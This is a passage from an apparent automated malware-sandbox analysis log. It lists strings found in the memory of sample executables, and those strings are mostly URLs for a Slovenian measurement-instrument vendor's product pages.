PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/plasticarstvo/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/aktivnost-vode-rotronic-meritve-water-activity-rotr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/co2-rotronic-merilniki-ogljikovega-dioksida/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dew-point-rotronic-meritve-tocke-rosisca-rotronic-v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/diferencialni-tlak-rotronic-merilniki-diferencialne
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dodatna-oprema-rotronic-montazna-prikljucna-kalibra
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/kalibracija-vlage-rotronic-naprave-za-kalibracijo-s
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/o2-rotronic-analizatorji-kisika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/rms-rotronic-monitoring-sistem-2/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/sw-rotronic-programska-oprema/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, 